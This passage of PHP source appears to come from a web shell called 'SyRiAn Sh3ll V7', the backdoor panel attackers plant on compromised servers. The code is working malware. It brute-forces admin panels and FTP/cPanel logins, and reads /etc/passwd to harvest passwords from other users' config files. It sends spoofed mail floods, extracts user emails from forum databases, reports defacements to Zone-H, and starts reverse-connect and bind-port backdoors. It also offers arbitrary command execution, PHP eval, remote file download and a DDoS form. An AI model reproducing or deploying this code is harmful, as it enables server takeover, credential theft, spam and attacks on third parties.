  1652. "moderator".$extention."",
  1653. "administrator/index".$extention."",
  1654. "administrator/login".$extention."",
  1655. "user".$extention."",
  1656. "administrator/account".$extention."",
  1657. "administrator".$extention."",
  1658. "login".$extention."",
  1659. "modelsearch/login".$extention."",
  1660. "moderator/login".$extention."",
  1661. "panel-administracion/admin".$extention."",
  1662. "admincontrol/login".$extention."",
  1663. "adm/index".$extention."",
  1664. "moderator/admin".$extention."",
  1665. "account".$extention."",
  1666. "controlpanel".$extention."",
  1667. "admincontrol".$extention."",
  1668. "webadmin/admin".$extention."",
  1669. "adminLogin".$extention."",
  1670. "panel-administracion/login".$extention."",
  1671. "wp-login".$extention."",
  1672. "adminLogin".$extention."",
  1673. "admin/adminLogin".$extention."",
  1674. "adminarea/index".$extention."",
  1675. "adminarea/admin".$extention."",
  1676. "adminarea/login".$extention."",
  1677. "panel-administracion/index".$extention."",
  1678. "modelsearch/index".$extention."",
  1679. "modelsearch/admin".$extention."",
  1680. "adm/admloginuser".$extention."",
  1681. "admloginuser".$extention."",
  1682. "admin2".$extention."",
  1683. "admin2/login".$extention."",
  1684. "admin2/index".$extention."",
  1685. "adm/index".$extention."",
  1686. "adm".$extention."",
  1687. "affiliate".$extention."",
  1688. "adm_auth".$extention."",
  1689. "memberadmin".$extention."",
  1690. "administratorlogin".$extention."");
  1691.                                 foreach ($adminlocales as $admin)
  1692.                                 {
  1693.                                         $headers = @get_headers("$url$admin");
  1694.                                         if (@eregi('200', $headers[0]))
  1695.                                         {
  1696.                                                 echo "[+] $url$admin  ~ Found!\n";
  1697.                                         }
  1698.                                        
  1699.                                 }
  1700.                         }
  1701.                 # --------------------------
  1702.                 #   Config Finder
  1703.                 #---------------------------
  1704.                 else if($_POST['configFinderSubmit'])
  1705.                 {
  1706.                         set_time_limit(0);
  1707.                         $passwd=fopen('/etc/passwd','r');
  1708.                         if (!$passwd)
  1709.                         {
  1710.                                 echo "[-] Error : coudn't read /etc/passwd";
  1711.                                 exit;
  1712.                         }
  1713.                         $path_to_public=array();
  1714.                         $users=array();
  1715.                         $pathtoconf=array();
  1716.                         $i=0;
  1717.                         while(!feof($passwd))
  1718.                         {
  1719.                                 $str=fgets($passwd);
  1720.                                 if ($i>35)
  1721.                                 {
  1722.                                    $pos=strpos($str,":");
  1723.                                    $username=substr($str,0,$pos);
  1724.                                    $dirz="/home/$username/public_html/";
  1725.                                    if (($username!=""))
  1726.                                    {
  1727.                                            if (is_readable($dirz))
  1728.                                            {
  1729.                                                    array_push($users,$username);
  1730.                                                    array_push($path_to_public,$dirz);
  1731.                                            }
  1732.                                    }
  1733.                                 }
  1734.                                 $i++;
  1735.                         }
  1736.                         echo "";
  1737.                         echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
  1738.                 ";
  1739.                         echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
  1740.                 ";
  1741.                         echo "[~] Searching for passwords in config.* files...
  1742.                 ";
  1743.                         foreach ($users as $user)
  1744.                         {
  1745.                                    $path="/home/$user/public_html/";
  1746.                                    read_dir($path,$user);
  1747.                         }
  1748.                         echo "[+] Done";
  1749.                 }
  1750.                 # --------------------------
  1751.                 #   Mail Storm
  1752.                 #---------------------------
  1753.                 else if($_POST['sendMailStorm'])
  1754.                 {
  1755.                         $to=$_POST['to'];
  1756.                         $nom=$_POST['nom'];
  1757.                         $Comments=$_POST['Comments'];
  1758.                         if ($to <> "" )
  1759.                         {
  1760.                                 for ($i = 0; $i < $nom ; $i++)
  1761.                                 {
  1762.                                         $from = rand (71,1020000000)."@"."Attacker.com";
  1763.                                         $subject= md5("$from");
  1764.                                         if(@mail($to,$subject,$Comments,"From:$from"))
  1765.                                         echo "[+] $i spammed !!
  1766. ";
  1767.                                         else
  1768.                                         {
  1769.                                                 echo "[-] $i Failed !!
  1770. ";
  1771.                                         }
  1772.                                 }
  1773.                         }
  1774.                 }
  1775.                 # --------------------------
  1776.                 #   Extract Emails                             
  1777.                 #---------------------------
  1778.                 else if($_POST['getEmails'])
  1779.                 {
  1780.                         $emhost = $_POST['EM_HOST'];
  1781.                         $emuser = $_POST['EM_USER'];
  1782.                         $empass = $_POST['EM_PASS'];
  1783.                         $emdb = $_POST['EM_DB'];
  1784.                         $emtab = $_POST['EM_TABLE'];
  1785.                         $emcol = $_POST['EM_COLUMN'];
  1786.                         $try2Connect = @mysql_connect($emhost,$emuser,$empass);
  1787.                         if(!$try2Connect)
  1788.                         {
  1789.                                 echo "[-] Can't Connect To DB !! [ user name || password is wrong ! ] .
  1790. ";
  1791.                         }
  1792.                         $try2Select = @mysql_select_db($emdb);
  1793.                         if(!$try2Select && $try2Connect)
  1794.                         {
  1795.                                 echo "[-] DB Name is Wrong !! . ";
  1796.                         }
  1797.                         $sql = @mysql_query("SELECT * FROM $emtab");
  1798.                         while ($res = @mysql_fetch_array($sql))
  1799.                         {
  1800.                                 echo ''.$res["$emcol"].'
  1801. ';
  1802.                         }
  1803.                 }
  1804.                 // Help
  1805.                 else if($_POST['emailExtractorHelp'])
  1806.                 {
  1807.                         echo "This is Some Tables Name & Columns Name For Some Fam Scripts ..
  1808.  
  1809. [+] VBulletin
  1810. Table-name : user
  1811. column-name : email
  1812.  
  1813. [+] WordPress
  1814. Table-name : wp_users
  1815. column-name : user_email
  1816.  
  1817. [+] Joomla
  1818. Table-name : jos_users
  1819. column-name : email
  1820.  
  1821. [+] PHPBB
  1822. Table-name : phpbb_users
  1823. column-name : user_email
  1824.  
  1825. [+] I.P.Board
  1826. Table-name : ibf_members
  1827. column-name : email
  1828.  
  1829. [+] SMF
  1830. Table-name : smf_members
  1831. column-name : emailAddress ";
  1832.                 }
  1833.                 # --------------------------
  1834.                 #   MySQL Query
  1835.                 #---------------------------
  1836.                 else if($_POST['MySQLQuery'])
  1837.                 {
  1838.                         $qu_host =$_POST['QU_HOST'];
  1839.                         $qu_user =$_POST['QU_USER'];
  1840.                         $qu_pass =$_POST['QU_PASS'];
  1841.                         $qu_db =$_POST['QU_DB'];
  1842.                         $query =$_POST['QU'];
  1843.                         if (empty($_POST['QU_HOST']))
  1844.                         $qu_host = 'localhost';
  1845.                         $query = str_replace("\\","",$query);
  1846.                         if (!empty($_POST['QU']))
  1847.                         {
  1848.                                 $tryConnection = @mysql_connect($qu_host,$qu_user,$qu_pass);
  1849.                                 if(!$tryConnection)
  1850.                                 {
  1851.                                         echo "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!";
  1852.                                 }
  1853.                                 else
  1854.                                 {
  1855.                                         $selectDB = @mysql_select_db($qu_db);
  1856.                                         if(!$selectDB)
  1857.                                         {
  1858.                                                 echo "[-] Database Name Is Wrong !!";
  1859.                                         }
  1860.                                         else
  1861.                                         {
  1862.                                                 $qqok1 = mysql_query($query);
  1863.                                                 if(!$qqok1)
  1864.                                                 {
  1865.                                                         echo "[-] Can't Execute The Query";
  1866.                                                 }
  1867.                                         }
  1868.                                 }
  1869.                                 @mysql_close();
  1870.                         }
  1871.                         if ($qqok1)
  1872.                         {
  1873.                                 update();
  1874.                         }
  1875.                 }
  1876.                         # --------------------------
  1877.                         #   SQL Reader
  1878.                         #---------------------------
  1879.                         else if ($_POST['sql2Read'])
  1880.                         {
  1881.                                 $host = $_POST['host'];
  1882.                                 $user = $_POST['user'];
  1883.                                 $pass = $_POST['pass'];
  1884.                                 $db = $_POST['db'];
  1885.                                 $unique = uniqid('N');
  1886.                                 $file = $_POST['file'];
  1887.                                 $file = str_replace('\\\\','\\',$file);
  1888.                                 $query = array(
  1889.                                 "CREATE TEMPORARY TABLE $unique (file LONGBLOB)",
  1890.                                 "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique",
  1891.                                 "SELECT * FROM $unique"
  1892.                                 );
  1893.                                 $connect = mysql_connect($host,$user, $pass);
  1894.                                 mysql_select_db($db,$connect);
  1895.                                 foreach($query as $Allqueries)
  1896.                                 {
  1897.                                         $mysqlQuery = mysql_query($Allqueries,$connect);
  1898.                                         while($line = @mysql_fetch_row($mysqlQuery))
  1899.                                         echo htmlspecialchars($line[0]);
  1900.                                         echo "\n";
  1901.                                 }
  1902.                         }
  1903.                         # --------------------------
  1904.                         #   Edit File
  1905.                         #---------------------------
  1906.                         else if($_POST['editFileSubmit'])
  1907.                         {
  1908.                                 $file2Edit = $_POST['editFile'];
  1909.                                 echo @file_get_contents($file2Edit);
  1910.                         }
  1911.                         else if($_POST['saveEditedFile'])
  1912.                         {
  1913.                                 $fileName = $_POST['file2edit'];
  1914.                                 $newFile = $_POST['ExecutionArea'];
  1915.                                 $trytoGenerate = GenerateFile($fileName,$newFile);
  1916.                                 if($trytoGenerate)
  1917.                                 {
  1918.                                         echo "[+] File Saved !";
  1919.                                 }
  1920.                                 else
  1921.                                 {
  1922.                                         echo "[-] Failed To Save File !!";     
  1923.                                 }
  1924.                         }
  1925.                         # --------------------------
  1926.                         #   Zone H Attacker
  1927.                         #---------------------------
  1928.                         else if($_POST['SendNowToZoneH'])
  1929.                         {
  1930.                                 ob_start();
  1931.                                 $sub = @get_loaded_extensions();
  1932.                                 if(!in_array("curl", $sub))
  1933.                                 {
  1934.                                         die('[-] Curl Is Not Supported !! ');
  1935.                                 }
  1936.                        
  1937.                                 $hacker = $_POST['defacer'];
  1938.                                 $method = $_POST['hackmode'];
  1939.                                 $neden = $_POST['reason'];
  1940.                                 $site = $_POST['domain'];
  1941.                                
  1942.                                 if (empty($hacker))
  1943.                                 {
  1944.                                         die ("[-] You Must Fill the Attacker name !");
  1945.                                 }
  1946.                                 elseif($method == "--------SELECT--------")
  1947.                                 {
  1948.                                         die("[-] You Must Select The Method !");
  1949.                                 }
  1950.                                 elseif($neden == "--------SELECT--------")
  1951.                                 {
  1952.                                         die("[-] You Must Select The Reason");
  1953.                                 }
  1954.                                 elseif(empty($site))
  1955.                                 {
  1956.                                         die("[-] You Must Inter the Sites List ! ");
  1957.                                 }
  1958.                                 $i = 0;
  1959.                                 $sites = explode("\n", $site);
  1960.                                 while($i < count($sites))
  1961.                                 {
  1962.                                         if(substr($sites[$i], 0, 4) != "http")
  1963.                                         {
  1964.                                                 $sites[$i] = "http://".$sites[$i];
  1965.                                         }
  1966.                                         ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  1967.                                         echo "Site : ".$sites[$i]." Defaced !\n";
  1968.                                         ++$i;
  1969.                                 }
  1970.                                 echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  1971.                         }
  1972.                         # --------------------------
  1973.                         #   FTP And Cpanle Brute Force Attacker
  1974.                         #---------------------------
  1975.                         else if($_POST['BruteForceCpanelAndFTP'])
  1976.                         {
  1977.                                 $connect_timeout=5;
  1978.                                 set_time_limit(0);
  1979.                                 $submit=$_REQUEST['BruteForceCpanelAndFTP'];
  1980.                                 $users=$_REQUEST['users'];
  1981.                                 $pass=$_REQUEST['passwords'];
  1982.                                 $target=$_REQUEST['target'];
  1983.                                 $cracktype=$_REQUEST['cracktype'];
  1984.                                
  1985.                                 if(empty($target))
  1986.                                 {
  1987.                                         $target = "localhost";
  1988.                                 }
  1989.                                
  1990.                                 function ftp_check($host,$user,$pass,$timeout)
  1991.                                 {
  1992.                                         $ch = curl_init();
  1993.                                         curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  1994.                                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1995.                                         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1996.                                         curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1997.                                         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1998.                                         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1999.                                         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  2000.                                         $data = curl_exec($ch);
  2001.                                         if ( curl_errno($ch) == 28 )
  2002.                                         {
  2003.                                                  print "Error : Connection Timeout Please Check The Target Hostname .";
  2004.                                                  exit;
  2005.                                         }
  2006.                                         elseif ( curl_errno($ch) == 0 )
  2007.                                         {
  2008.                                                 print "[+] Cracking Success With Username ($user) and Password ($pass)";
  2009.                                         }
  2010.                                         curl_close($ch);
  2011.                                 }
  2012.                                 function cpanel_check($host,$user,$pass,$timeout)
  2013.                                 {
  2014.                                         $ch = curl_init();
  2015.                                         curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  2016.                                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2017.                                         curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  2018.                                         curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  2019.                                         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  2020.                                         curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  2021.                                         $data = curl_exec($ch);
  2022.                                         if ( curl_errno($ch) == 28 )
  2023.                                         {
  2024.                                                 print "[-] Connection Timeout Please Check The Target Hostname .";
  2025.                                                 exit;
  2026.                                         }
  2027.                                         elseif ( curl_errno($ch) == 0 )
  2028.                                         {
  2029.                                                 print "[+] Cracking Success With Username ($user) and Password ($pass)";
  2030.                                         }
  2031.                                         curl_close($ch);
  2032.                                 }
  2033.                                 if(isset($submit) && !empty($submit))
  2034.                                 {
  2035.                                         if(empty($users) && empty($pass))
  2036.                                         {
  2037.                                                 print "[-] Please Check The Users or Password List Entry . . .";
  2038.                                         }
  2039.                                         if(empty($users))
  2040.                                         {
  2041.                                                 print "[-] Please Check The Users List Entry . . .";
  2042.                                         }
  2043.                                         if(empty($pass))
  2044.                                         {
  2045.                                                 print "[-] Please Check The Password List Entry . . ";
  2046.                                         }
  2047.                                         $userlist=explode("\n",$users);
  2048.                                         $passlist=explode("\n",$pass);
  2049.                                         print "[~]# Cracking Process Started, Please Wait ...";
  2050.                                         foreach ($userlist as $user)
  2051.                                         {
  2052.                                                 $pureuser = trim($user);
  2053.                                                 foreach ($passlist as $password )
  2054.                                                 {
  2055.                                                         $purepass = trim($password);
  2056.                                                         if($cracktype == "ftp")
  2057.                                                         {
  2058.                                                                 ftp_check($target,$pureuser,$purepass,$connect_timeout);
  2059.                                                         }
  2060.                                                         if ($cracktype == "cpanel")
  2061.                                                         {
  2062.                                                                 cpanel_check($target,$pureuser,$purepass,$connect_timeout);
  2063.                                                         }
  2064.                                                 }
  2065.                                         }
  2066.                                 }
  2067.                         }
  2068.                         # --------------------------
  2069.                         #   Back Connection
  2070.                         #---------------------------
  2071.                         else if($_POST['backconn'])
  2072.                         {
  2073.                                 if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  2074.                                 {
  2075.                                         $ip = trim($_POST['ip']);
  2076.                                         $port = trim($_POST['backport']);
  2077.                                         tulis("bcc.c",$back_connect_c);
  2078.                                         Exe('gcc -o bcc bcc.c');
  2079.                                         Exe('chmod 777 bcc');
  2080.                                         @unlink('bcc.c');
  2081.                                         Exe("./bcc ".$ip." ".$port." &");
  2082.                                         $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2083.                                 }
  2084.                                 elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  2085.                                 {
  2086.                                         $ip = trim($_POST['ip']);
  2087.                                         $port = trim($_POST['backport']);
  2088.                                         tulis("bcp",$back_connect);
  2089.                                         Exe("chmod +x bcp");
  2090.                                         $p2=which("perl");
  2091.                                         Exe($p2." bcp ".$ip." ".$port." &");
  2092.                                         $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2093.                                 }
  2094.                         }
  2095.                         # --------------------------
  2096.                         #   Bind Connection
  2097.                         #---------------------------
  2098.                         else if($_POST['bind'])
  2099.                         {
  2100.                                 if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  2101.                                 {
  2102.                                         $port = trim($_POST['port']);
  2103.                                         $passwrd = trim($_POST['bind_pass']);
  2104.                                         tulis("bdc.c",$port_bind_bd_c);
  2105.                                         Exe('gcc -o bdc bdc.c');
  2106.                                         Exe('chmod 777 bdc');
  2107.                                         @unlink("bdc.c");
  2108.                                         Exe("./bdc ".$port." ".$passwrd." &");
  2109.                                         $scan = Exe("ps aux");
  2110.                                         if(eregi("./bdc $por",$scan))
  2111.                                         {
  2112.                                                 $msg = "Process found running, backdoor setup successfully.";
  2113.                                         }
  2114.                                         else
  2115.                                         {
  2116.                                                 $msg = "Process not found running, backdoor not setup successfully.";
  2117.                                         }
  2118.                                 }
  2119.                                
  2120.                                 elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  2121.                                 {
  2122.                                         $port = trim($_POST['port']);
  2123.                                         $passwrd = trim($_POST['bind_pass']);
  2124.                                         tulis("bdp",$port_bind_bd_pl);
  2125.                                         Exe("chmod 777 bdp");
  2126.                                         $p2=which("perl");
  2127.                                         Exe($p2." bdp ".$port." &");
  2128.                                         $scan = Exe("ps aux");
  2129.                                         if(eregi("$p2 bdp $port",$scan))
  2130.                                         {
  2131.                                                 $msg = "Process found running, backdoor setup successfully.";
  2132.                                         }      
  2133.                                         else
  2134.                                         {
  2135.                                                 $msg = "Process not found running, backdoor not setup successfully.";
  2136.                                         }
  2137.                                 }      
  2138.                         }
  2139.  
  2140.                
  2141.         echo "</textarea>";
  2142.         if($_POST['editFileSubmit'])
  2143.         {
  2144.                 echo "<input type='hidden' value='".$_POST['editFile']."' name='file2edit' /> ";
  2145.                 echo "<input type='submit' value='Save' name='saveEditedFile'>";
  2146.         }
  2147.         echo "</form>
  2148.  
  2149.         <!-- Main Table -->
  2150.         <table width='100%'><tr>
  2151.         <td width='30%' height=30>
  2152.         <!-- End Of Main Table -->
  2153.         <!-- Commands Alias-->
  2154.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2155.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2156.     <td style='background-color:#666;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>";SelectCommand($os); echo "<input
  2157.  
  2158. name='submitCommands' type='submit' value='ExecuteCommand'></td></tr></table></form>
  2159.         <!-- End Of Commands Alias-->
  2160.         </td>
  2161.         <td width='30%' height=30>
  2162.         <!-- Command Line -->
  2163.         <form method='POST'>
  2164.         <table width='100%' height='72' border='0'  id='Box'><tr>
  2165.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2166.     <td style='background-color:#666;padding-left:10px;'>Command Line </td></tr><tr><td height='45' colspan='2'>
  2167.         <input type='text' name='cmd' id='commandLine' value='dir' size=59>
  2168.         <input type='text' name='directory' value=".getcwd()." size=59>
  2169.         <input name='Execute' id='Execute' type='submit' value='Execute' >
  2170.         </td></tr></table></form>
  2171.         <!-- End Of Command Line -->
  2172.         </td>
  2173.         <td width='30%' height=30>
  2174.         <!-- Edit File -->
  2175.         <form method=POST>
  2176.         <table width='100%' height='72' border='0'  id='Box'><tr>
  2177.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2178.     <td style='background-color:#666;padding-left:10px;'>Edit File </td></tr><tr><td height='45' colspan='2'>
  2179.         <input type='text' name='editFile' size=59>
  2180.         <input name='editFileSubmit' type='submit' value='Edit'>
  2181.         </td></tr></table></form>
  2182.         <!-- End Of Edit File -->
  2183.         </td>
  2184.         </tr>
  2185.         <tr>
  2186.         <td width='30%'>
  2187.         <!-- Chmod Force -->
  2188.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2189.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2190.     <td style='background-color:#666;padding-left:10px;'>Change Mode </td></tr><tr><td height='45' colspan='2'>
  2191.         <input type='text' name='fileName' value='index.php' size=48>
  2192.         <br/><input type='text' name='per' value='0644' size='10'>
  2193.         <input type=submit value='Change Now !' name='changePermission'>
  2194.         </td></tr></table></form>
  2195.         <!-- End Of Chmod Force -->
  2196.         </td>
  2197.         <td>
  2198.         <!-- Get File -->
  2199.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2200.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2201.     <td style='background-color:#666;padding-left:10px;'>Get File </td></tr><tr><td height='45' colspan='2'>
  2202.         <input type='text' name='fileUrl' size='59' value='http://www.'>
  2203.         <select name=getType>
  2204.         <option value=wget>wget</option>
  2205.         <option value='curl -o'>curl -o</option>
  2206.         <option value=get>get</option>
  2207.         <option value='lynx -source'>lynx -source</option>
  2208.         </select>
  2209.         <input name=getFile type=submit value='Get File' >
  2210.         </td></tr></table></form>
  2211.         <!-- End Of Get File -->
  2212.         </td>
  2213.         <td>
  2214.         <!-- Bind Connection -->
  2215.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2216.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2217.     <td style='background-color:#666;padding-left:10px;'>Bind Connection </td></tr><tr><td height='45' colspan='2'>
  2218.         <input class='inputz' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["HTTP_HOST"])."'>
  2219.         <input type='text' name='port' size='26' value='443'>
  2220.         <select class='inputz' size='1' name='use'>
  2221.         <option value='Perl'>Perl</option><option value='C'>C</option>
  2222.         </select>
  2223.         <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'>
  2224.         </td></tr></table></form>
  2225.         <!-- End Of Bind Connection -->
  2226.         </td>
  2227.         </tr>
  2228.         <tr>
  2229.         <td>
  2230.         <!-- CGI perl -->
  2231.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2232.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2233.     <td style='background-color:#666;padding-left:10px;'>CGI Perl </td></tr><tr><td height='45' colspan='2'>
  2234.         <input type='text' value='".getcwd()."' name='cgiperlPath' size='43'>
  2235.         <input type='submit' name='generatePel' value='Generate'></td></tr></table></form>
  2236.         <!-- End Of CGI perl -->
  2237.         </td><td>
  2238.         <!-- Forbidden -->
  2239.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2240.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2241.     <td style='background-color:#666;padding-left:10px;'>Forbidden </td></tr><tr><td height='45' colspan='2'>
  2242.         <input type='text' value='".getcwd()."' name='forbiddenPath' size='70%'/>
  2243.         <select name='403'>
  2244.         <option value='DirectoryIndex'>DirectoryIndex</option>
  2245.         <option value='HeaderName'>HeaderName</option>
  2246.         <option value='TXT'>TXT</option>
  2247.         <option value='404'>404</option>
  2248.         <option value='ReadmeName'>ReadmeName</option>
  2249.         <option value='footerName'>footerName</option>
  2250.         </select>
  2251.         <input type='submit' value='Generate' name='generateForbidden'>
  2252.         </td></tr></table></form>
  2253.         <!-- End Of Forbidden -->
  2254.         </td>
  2255.         <td>
  2256.         <!-- Back Connection -->
  2257.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2258.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2259.     <td style='background-color:#666;padding-left:10px;'>Back Connection </td></tr><tr><td height='45' colspan='2'>
  2260.         <input type='text' name='ip' size='26' value='".GetRealIP()."'>
  2261.         <input type='text' name='backport' size='26' value='443'>
  2262.         <select name='use'>
  2263.         <option value='Perl'>Perl</option>
  2264.         <option value='C'>C</option>
  2265.         </select>
  2266.         <input type='submit' name='backconn' value='Connect'>
  2267.         </td></tr></table></form>
  2268.         <!-- End Of Back Connection -->
  2269.         </td>
  2270.         </tr>
  2271.         <tr>
  2272.         <td>
  2273.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2274.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2275.     <td style='background-color:#666;padding-left:10px;'>Hash Analyzer </td></tr><tr><td height='45' colspan='2'>
  2276.         <input type='text' name='hashToAnalyze' size=60>
  2277.         <input type='submit' value='Analyze Now' name='analyzieNow'></td></tr></table></form>
  2278.         </td>
  2279.         <td>
  2280.         <!-- Eval Code -->
  2281.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2282.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2283.     <td style='background-color:#666;padding-left:10px;'>Eval Code </td></tr><tr><td height='45' colspan='2'>
  2284.         <input type='text' name='php_eval' size='70' value='echo \"SyRiAn Sh3ll V7\";'>
  2285.         <input type=submit name=submitEval value=Eval></td></tr></table></form>
  2286.         <!-- End Of Eval Code -->
  2287.         </td>
  2288.         <td>
  2289.         <!-- Users & Domains -->
  2290.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2291.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2292.     <td style='background-color:#666;padding-left:10px;'>Users & Domains </td></tr><tr><td height='45' colspan='2'>
  2293.         <input type='text' name='usersPath' value='".getcwd()."' size='55'/>
  2294.         <input type='submit' name='GenerateUsers' Value='Generate'>
  2295.         <!-- End Of Users & Domains -->
  2296.         </td></tr></table></form>
  2297.         </td>
  2298.         </tr>
  2299.         <tr>
  2300.         <td>
  2301.         <!-- Reading Files -->
  2302.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2303.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2304.     <td style='background-color:#666;padding-left:10px;'>Reading Files & Dir Using PHP Bugs </td></tr><tr><td height='45' colspan='2'>
  2305.         <input type='text' value='/etc/passwd' name='file' size=35>
  2306.         <input class='buttons' type='submit' name='read' value='Read File'>
  2307.         <input class='buttons' type='submit' name='show' value='Show directory'>
  2308.         </td></tr></table></form>
  2309.         <!-- End Of Reading Files -->
  2310.         </td>
  2311.         <td>
  2312.         <!--Encryption -->
  2313.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2314.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2315.     <td style='background-color:#666;padding-left:10px;'>Encryption </td></tr><tr><td height='45' colspan='2'>
  2316.         <input type='text' value='SyRiAn_Sh3ll' name='ENCRYPTION' size='80%'>
  2317.         <input type='submit' value='Encrypt' name='encryptNow'>
  2318.         </td></tr></table></form>
  2319.         <!-- End Of Encryption -->
  2320.         </td>
  2321.         <td>
  2322.         <!-- Metasploit RC -->
  2323.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2324.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2325.     <td style='background-color:#666;padding-left:10px;'>Metasploit Connection </td></tr><tr><td height='45' colspan='2'>
  2326.         <input type='text' size='15' name='ip' value='127.0.0.1'>
  2327.         <input type='text' size='5' name='port' value='443'>
  2328.         <input type='submit' value='Connect' name='metaConnect'>
  2329.         </td></tr></table></form>
  2330.         <!-- End Of Metasploit RC -->
  2331.         </td>
  2332.         </tr>
  2333.         <tr>
  2334.         <td>
  2335.         <!-- DDOS Attacker -->
  2336.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2337.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2338.     <td style='background-color:#666;padding-left:10px;'>DDOS Attacker </td></tr><tr><td height='45' colspan='2'>
  2339.         <input type='text' name='ipToAttack' size='40' value='Target IP'>
  2340.         <input type='text' name='portToAttack' size='20' value='Target PORT'>
  2341.         <input type='submit' name='StartAttack' value='Attack'>
  2342.         </td></tr></table></form>
  2343.         <!-- End Of DDOS Attacker -->
  2344.         </td>
  2345.         <td>
  2346.         <!-- Ports Scanner -->
  2347.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2348.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2349.     <td style='background-color:#666;padding-left:10px;'>Ports Scanner </td></tr><tr><td height='45' colspan='2'>
  2350.         <input type='text' name='domainToScanPort' size='50' value='172.0.0.1'> <input type='submit' name='submitDomainToScanPort' Value='Scan Now'>
  2351.         </td></tr></table></form>
  2352.         <!-- End Of Ports Scanner -->
  2353.         </td>
  2354.         <td>
  2355.         <!-- ACP Finder -->
  2356.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2357.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2358.     <td style='background-color:#666;padding-left:10px;'>ACP Finder </td></tr><tr><td height='45' colspan='2'>
  2359.         <input name='hash_lol' class='textbox' type='text' size='30' value='http://www.example.com/'/>
  2360.         <input type='text' value='.php' name='extention'/>
  2361.         <input name='submit_lol' class='textbox' value='Brute Force Now' type='submit'>
  2362.         <!-- End Of ACP Finder -->
  2363.         </td></tr></table></form>
  2364.         </td>
  2365.         </tr>
  2366.        
  2367.         <tr>
  2368.         <br>
  2369.         <td valign='top'>
  2370.         <!-- Server ShortCut -->
  2371.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2372.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2373.     <td style='background-color:#666;padding-left:10px;'>Server ShortCut </td></tr><tr><td height='45' colspan='2'>
  2374.         <input type='text' value='".getcwd()."' size='68' name='ShourtCutPath'>
  2375.         <input type='submit' name='generateSER' value=' Generate '>
  2376.         </td></tr></table></form>
  2377.         <!-- End Of Server ShoutCut -->
  2378.         </td>
  2379.         <td valign='top'>
  2380.         <!-- Fast Tools -->
  2381.         <form method=POST><table width='100%' height='72' border='0'  id='Box'><tr>
  2382.     <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2383.     <td style='background-color:#666;padding-left:10px;'>Fast Tools </td></tr><tr><td height='45' colspan='2'>
  2384.         <input type=submit value='Generate .HTAccess' name='htaccessGenerate'>
  2385.         <input type=submit value='Generate php.ini' name='phpiniGenerate'>
